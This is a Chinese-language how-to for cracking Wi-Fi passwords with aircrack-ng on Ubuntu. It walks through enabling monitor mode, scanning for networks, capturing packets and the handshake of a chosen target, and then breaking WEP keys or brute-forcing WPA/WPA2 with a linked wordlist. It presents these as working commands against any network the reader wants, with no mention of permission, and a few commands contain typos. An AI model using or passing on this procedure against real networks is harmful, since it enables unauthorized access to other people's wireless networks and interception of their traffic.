测试环境在linux平台下,我用的是ubuntu环境。ubuntu安装可以直接用sudo apt-get install aircrack-ng
linux应该可以用yum -y install aircrack-ng 来安装,如果下载它的安装包,没有fangqian的话,非常慢。
------------------------------------------------------------------------------------
方法:
1.确保你的无线是打开的:ifconfig看是否有wlan0或别的无线适配器已经启动,如果没有,后面的步骤都执行不了
可以先用ifconfig -a看是否有无线适配器,再用ifconfig wlan0 up命令启动无线适配器(wlan0为ifconfig -a中查找到的无线适配器名称)
2.激活网卡为监听模式:
sudo airmon-ng start wlan0
3.查看无线网络,开始抓取无线数据包
sudo airodump-ng mon0
注意:这里的mon0是你的wlan开始监听之后的别名,一般可能会出现的问题是:
rtl8187 - [phy1]SIOCSIFFLAGS: Name not unique on network
如果出现这个问题,按照这个来解决
sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up sudo airodump-ng wlan0
或者:
airmon-ng check kill airmon-ng start <interface> airodump-ng wlan0mon
不过网络管理给关掉了
sudo servicenetwork-manager stop # 停止 nm服务 udo servicenetwork-manager start # 开启 nm服务
如果一切没有问题====》
这时就会显示你当前可以搜索到的无线信号,PWR是信号值,数值越大表示信号越强,ESSID就是这个信号的名称.ENC为加密方式(WEP最容易破,wpa,wpa2都只能暴力破解)
找到一个你希望破解的essid
4.确定目标后
sudo airodump-ng -c 6 --bssid target‘s MAC -w file mon0
-c 6是指这个信号的频道 ,就是CH那个频道
target‘s MAC 是你想要破解的MAC地址
file 是aircrack-ng 跟目标地址握手后保存的数据
5.收到足够的包之后(即data),开始破解
sudo aircrack-ng file-01.cap
file-01.cap 就是握手后保存的数据
如果是wep类型的密码,在收到足够多的包之后(1w)可以直接破解
如果是wpa/wpa2类型的加密方式,则必须收到握手包之后才能开始暴力破解并且需要使用密码文件(给出一个地址:http://static.hackersgarage.com/darkc0de.lst.gz)如果密码足够复杂的话这样的密码文件也是不够的,需要自己去下更复杂的加密文件
sudo aircrack-ng -w dic file-01.cap
破解成功就能拿到密码了